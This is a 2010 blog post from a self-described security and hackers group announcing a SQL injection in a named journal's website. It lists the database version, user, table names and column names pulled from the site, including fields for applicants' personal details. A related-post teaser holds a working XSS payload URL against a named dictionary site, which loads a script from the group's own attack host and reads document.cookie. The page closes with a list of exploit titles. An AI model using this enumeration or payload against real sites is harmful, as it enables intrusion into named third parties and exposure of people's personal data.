Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal – PlanetCreator’s Security Team and Hackers Group

Home / Hacking, News, Security / Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

September 2, 2010 PlanetCreator 0 Comments 0 tags

Security Researcher $@T0R! reported another Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typedÂ and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

This is critical and reported to webmaster:

These are some info and screenshots from vul site:

5.0.45-community-nt:[email protected]:ecobase

Tables eco_comment_type,eco_mail_list,eco_month_list,eco_poll_qus,eco_reader_digest, eco_tbl_applicant,eco_tbl_article,eco_tbl_category,eco_tbl_comment,eco_tbl_coverstory, eco_tbl_data,eco_tbl_health,eco_tbl_interview,eco_tbl_issue,eco_tbl_joke,eco_tbl_member, eco_tbl_news,eco_tbl_product,eco_tbl_yzone,eco_vote_ans,eco_year_list

Columns
id,type,NO,name,mail,ID,mName,yID,pno,pTitle,RID,Header,Pic,issue,rate,shortnotes, detaildata,appNo,Name,DOB,NRC,Address,Email,Education,Skill,Experience,CurrentJob, Company,Office,AppliedFor,Shift,CurrentSalary,ExpectedSalary,ContactNo,Photograph, ApplyTo,ID,title,apath,Img,issue,rate,shortnotes,ID,cName,id,comment,type_id, time,Isshow,volume

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

#RefRef – Denial of Service ( DDoS ) Tool Developed by Anonymous

Anonymous is developing a new DDoS tool which is said to exploit SQL vulnerabilities to support the group’s future campaigns. So far, what they have is something that is platform

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

What are the components of a security evaluation?

Any security evaluation involves three components: * Preparation: In this phase, a formal contract is signed between an ethical hacker and the authority of the organization that contains a non-disclosure

[webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
on November 15, 2024 at 12:00 am
SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
[webapps] reNgine 2.2.0 - Command Injection (Authenticated)
on October 1, 2024 at 12:00 am
reNgine 2.2.0 - Command Injection (Authenticated)
[webapps] dizqueTV 1.5.3 - Remote Code Execution (RCE)
on October 1, 2024 at 12:00 am
dizqueTV 1.5.3 - Remote Code Execution (RCE)
[webapps] openSIS 9.1 - SQLi (Authenticated)
on October 1, 2024 at 12:00 am
openSIS 9.1 - SQLi (Authenticated)
[dos] Windows TCP/IP - RCE Checker and Denial of Service
on August 28, 2024 at 12:00 am
Windows TCP/IP - RCE Checker and Denial of Service